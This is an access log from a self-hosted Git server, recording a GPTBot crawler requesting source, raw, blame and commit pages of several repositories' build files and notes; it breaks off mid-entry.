[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:15:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11754] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" +[17/Feb/2026:15:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11754] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" +[17/Feb/2026:15:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11877] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" +[17/Feb/2026:15:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10160] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" +[17/Feb/2026:15:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 13497] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:15:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" +[17/Feb/2026:15:20:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/README.md" +[17/Feb/2026:15:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:15:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11115] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject" +[17/Feb/2026:15:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11106] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" +[17/Feb/2026:15:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11106] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject" +[17/Feb/2026:15:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" +[17/Feb/2026:15:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" +[17/Feb/2026:15:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12894] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" +[17/Feb/2026:15:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12894] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" +[17/Feb/2026:15:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" +[17/Feb/2026:15:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" +[17/Feb/2026:15:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" +[17/Feb/2026:15:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?files=html%2fstatus.json" [Client 74.7.227.38] [Length 15610] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" +[17/Feb/2026:15:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13349] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" +[17/Feb/2026:15:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13350] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" +[17/Feb/2026:15:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13349] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" +[17/Feb/2026:15:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19493] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" +[17/Feb/2026:15:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19493] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" +[17/Feb/2026:15:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19491] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" +[17/Feb/2026:15:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11405] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" +[17/Feb/2026:15:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11403] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" +[17/Feb/2026:15:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11406] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" +[17/Feb/2026:15:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" +[17/Feb/2026:15:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" +[17/Feb/2026:15:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13478] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" +[17/Feb/2026:15:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10935] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build" +[17/Feb/2026:15:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build" +[17/Feb/2026:15:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build" +[17/Feb/2026:15:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21645] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 